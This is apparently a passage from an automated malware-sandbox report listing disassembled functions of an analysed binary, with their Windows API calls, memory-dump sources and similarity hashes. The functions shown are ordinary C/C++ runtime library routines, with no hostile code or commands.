                                                                                                                                                                    • Instruction ID: f318e012d43bb99a512f4df76be8f6619b1326af3b628013e632017dbc91132d
                                                                                                                                                                    • Opcode Fuzzy Hash: 5d30feb95a5c1a0a40ae931941b2a97de51d7494df1646863e40e35b2e585f71
                                                                                                                                                                    • Instruction Fuzzy Hash: 1E71D672904205ABDF219F9C8C45BAE7BBAEF4B310F194655F909A7281E7B6CC00C772
                                                                                                                                                                    Function 00D954C5 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00D9550C
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00D95538
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00D95577
                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D95594
                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D955D3
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00D955F0
                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D95632
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00D95655
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2040435927-0
                                                                                                                                                                    • Opcode ID: 9eb6b091062c5bc6f62075649aaae10cfa16b73e43f3a6e31e8fbf9530ba94c1
                                                                                                                                                                    • Instruction ID: e9c991ee5b91f2adadf090b7ee72f34a64335a079fd9831a9afc052238ef6ec3
                                                                                                                                                                    • Opcode Fuzzy Hash: 9eb6b091062c5bc6f62075649aaae10cfa16b73e43f3a6e31e8fbf9530ba94c1
                                                                                                                                                                    • Instruction Fuzzy Hash: 6A51BE72600606EFEF229F64EC45FAA7BA9EF40750F694539F905E6198DB30CD109BB0
                                                                                                                                                                    Function 00D961E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00D96217
                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00D9621F
                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00D962A8
                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00D962D3
                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00D96328
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                    • String ID: csm
                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                    • Opcode ID: 92d8e712b207ed14d847b18cd667db5df8b1a6c3b4ae2ded133375c7df567ebd
                                                                                                                                                                    • Instruction ID: c586d583ab1745bfa2c67831caf1dc632cbfd5b4b9e163b4f55711c97a1f8de4
                                                                                                                                                                    • Opcode Fuzzy Hash: 92d8e712b207ed14d847b18cd667db5df8b1a6c3b4ae2ded133375c7df567ebd
                                                                                                                                                                    • Instruction Fuzzy Hash: 0641B330A00218EFCF11DF68C885A9E7BB5EF45324F188555F818AB392DB31EA05CBB5
                                                                                                                                                                    Function 00D9F469 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00D9F578,00D9186A,?,00000000,00D931E1,00D9186C,?,00D9F1F6,00000022,FlsSetValue,00DADFE0,00DADFE8,00D931E1), ref: 00D9F52A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                                                                    • Opcode ID: 1dd367d89e3e6350d866c839d3ccc07e7f668757508970b73dcf89ce3d598cf0
                                                                                                                                                                    • Instruction ID: 11c2d0f8adb64f55925134126cdcd4decf98e5d24d17778de694e68c9dee4e7c
                                                                                                                                                                    • Opcode Fuzzy Hash: 1dd367d89e3e6350d866c839d3ccc07e7f668757508970b73dcf89ce3d598cf0
                                                                                                                                                                    • Instruction Fuzzy Hash: 06218176A41311EBCF229B64EC44A5A7768DB41764B294620F956E7390E670EE00D6F0
                                                                                                                                                                    Function 00DA625D Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e9a8e5b7324781a31f8335fb7d0f9bdaf487f02e221d6432d5d054ad7169de58
                                                                                                                                                                    • Instruction ID: 2dffe5bfd174066dc8afa8ab0b9a737d6bc84a809761f61d85d2cc424a526569
                                                                                                                                                                    • Opcode Fuzzy Hash: e9a8e5b7324781a31f8335fb7d0f9bdaf487f02e221d6432d5d054ad7169de58
                                                                                                                                                                    • Instruction Fuzzy Hash: 01B1BA71E04244EBDF119FA8D890BAEBBB1EF4A310F1C4259E5419B296C7B0D9418BB1
                                                                                                                                                                    Function 00D9D2C0 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00D9D2B7,00D95FB7,00D95179), ref: 00D9D2CE
                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D9D2DC
                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D9D2F5
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00D9D2B7,00D95FB7,00D95179), ref: 00D9D347
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                    • Opcode ID: bac457c1d0357e43d4fd7ae8762c2000ad9b1ee127a26699745eeb32f5bafc45
                                                                                                                                                                    • Instruction ID: ec115a08063d6267eeeacb580e6643f29f2181582ee05f5d62edd4d344eaa71a
                                                                                                                                                                    • Opcode Fuzzy Hash: bac457c1d0357e43d4fd7ae8762c2000ad9b1ee127a26699745eeb32f5bafc45
                                                                                                                                                                    • Instruction Fuzzy Hash: EC01FC3210E712DEAF2627747CC5A6F3645EB027757240329F110D52E5EF514D0597B1
                                                                                                                                                                    Function 00D9DB88 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00D9DCA7
                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00D9DF20
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                    • API String ID: 2673424686-393685449
                                                                                                                                                                    • Opcode ID: 4b58dc205da27564a77d08291fec016d976937d135400b06f74ae3c4050395a1
                                                                                                                                                                    • Instruction ID: 542dc2b2f14e83631d802ee2e10cbf9d06177afe852f3b70b893bc5096a1e876
                                                                                                                                                                    • Opcode Fuzzy Hash: 4b58dc205da27564a77d08291fec016d976937d135400b06f74ae3c4050395a1
                                                                                                                                                                    • Instruction Fuzzy Hash: 53B19C71800209EFCF25EFA4D9819AEBBB6FF18310F18415AF8116B206D775EA51CBB1
                                                                                                                                                                    Function 00D98C55 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D54F2704,?,?,00000000,00DAB774,000000FF,?,00D98D16,00D98BFD,?,00D98DB2,00000000), ref: 00D98C8A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D98C9C
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,00DAB774,000000FF,?,00D98D16,00D98BFD,?,00D98DB2,00000000), ref: 00D98CBE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                    • Opcode ID: 7efbb5db28a844a7b10248094a0365a1f19e8520dad58414b8dc48bf2822ecce
                                                                                                                                                                    • Instruction ID: df86e29faa85f9ca73dfc34fc5d41ebbcbbcdd9a9812470cf00676be981bcef5
                                                                                                                                                                    • Opcode Fuzzy Hash: 7efbb5db28a844a7b10248094a0365a1f19e8520dad58414b8dc48bf2822ecce
                                                                                                                                                                    • Instruction Fuzzy Hash: B3018F32A41715EFCF118B54CC09BAEBBB8FB45B10F040625E812E22D0DBB49900DAB0
                                                                                                                                                                    Function 00D9FC3D Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00D9FCC2
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00D9FD8B
                                                                                                                                                                    • __freea.LIBCMT ref: 00D9FDF2
                                                                                                                                                                      • Part of subcall function 00D9E531: RtlAllocateHeap.NTDLL(00000000,00D931E1,00D9186A,?,00D960C1,00D9186C,00D9186A,?,?,?,00D93181,00D931E1,00D9186E,00D9186A,00D9186A,00D9186A), ref: 00D9E563
                                                                                                                                                                    • __freea.LIBCMT ref: 00D9FE05
                                                                                                                                                                    • __freea.LIBCMT ref: 00D9FE12
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1423051803-0
                                                                                                                                                                    • Opcode ID: 558103eddf99ae047a191891c2ab816e76171c6e72c878697e75a8e9df9ab694
                                                                                                                                                                    • Instruction ID: 48b74b58ffaf5e7b786c6ca65898b5682caf9c0b4e79585720a87ef705a37c50
                                                                                                                                                                    • Opcode Fuzzy Hash: 558103eddf99ae047a191891c2ab816e76171c6e72c878697e75a8e9df9ab694
                                                                                                                                                                    • Instruction Fuzzy Hash: 8A51B272604206AFEF219F619C81EBB7BA9EF44710B2D4538FD04D7122EB31CC6086B0
                                                                                                                                                                    Function 00D93010 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 00D93017
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00D93022
                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00D93090
                                                                                                                                                                      • Part of subcall function 00D92EE4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D92EFC
                                                                                                                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 00D9303D
                                                                                                                                                                    • _Yarn.LIBCPMT ref: 00D93053
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1088826258-0
                                                                                                                                                                    • Opcode ID: eb676b36f89be2a2c8bcbf548a9f869d8596a0f2bbb1981ab67d3e387bf90231
                                                                                                                                                                    • Instruction ID: 2f9445e315849c6cb2bc111873a6527773f4c7f0aae9f942a2ca3534fdb763a2
                                                                                                                                                                    • Opcode Fuzzy Hash: eb676b36f89be2a2c8bcbf548a9f869d8596a0f2bbb1981ab67d3e387bf90231
                                                                                                                                                                    • Instruction Fuzzy Hash: B3017CB5A00610EBCF16EF60E88557D7BA1FF84350B184109E81297391CF35AE02DBB1
                                                                                                                                                                    Function 00DA7E92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00DA7F2E,00000000,?,00DB6E10,?,?,?,00DA7E65,00000004,InitializeCriticalSectionEx,00DAE57C,00DAE584), ref: 00DA7E9F
                                                                                                                                                                    • GetLastError.KERNEL32(?,00DA7F2E,00000000,?,00DB6E10,?,?,?,00DA7E65,00000004,InitializeCriticalSectionEx,00DAE57C,00DAE584,00000000,?,00D9E1DC), ref: 00DA7EA9
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00DA7ED1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                                                                                    • Opcode ID: 966093eace4cdd8869cff75a437db8690054ff22cadb6d225d68992fbc8b5f7f
                                                                                                                                                                    • Instruction ID: 850020eba7f51e621acb16e0acec77135bece02755caa52623db343672d285a1
                                                                                                                                                                    • Opcode Fuzzy Hash: 966093eace4cdd8869cff75a437db8690054ff22cadb6d225d68992fbc8b5f7f
                                                                                                                                                                    • Instruction Fuzzy Hash: B4E04831284309FBEF101B60DC06B597B59DB11B51F144060F90DF85E1E771EE50A6F4
                                                                                                                                                                    Function 00DA562D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetConsoleOutputCP.KERNEL32(D54F2704,00000000,00000000,?), ref: 00DA5690
                                                                                                                                                                      • Part of subcall function 00D9E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D9FDE8,?,00000000,-00000008), ref: 00D9E6A2
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DA58E2
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00DA5928
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00DA59CB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2112829910-0
                                                                                                                                                                    • Opcode ID: bde30fbed5e78d264721e93a29945bb6a53acffd53f0d205d062eb5f87aee5e9
                                                                                                                                                                    • Instruction ID: d188adcfe42935ad8d4aca2f7017e83aee400365b1d655d389b3dde31a7aa15b
                                                                                                                                                                    • Opcode Fuzzy Hash: bde30fbed5e78d264721e93a29945bb6a53acffd53f0d205d062eb5f87aee5e9
                                                                                                                                                                    • Instruction Fuzzy Hash: 22D15975D04648DFCF15CFA8E8809AEBBB9FF0A310F28456AE456EB355D630A941CF60
                                                                                                                                                                    Function 00D9D8AF Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
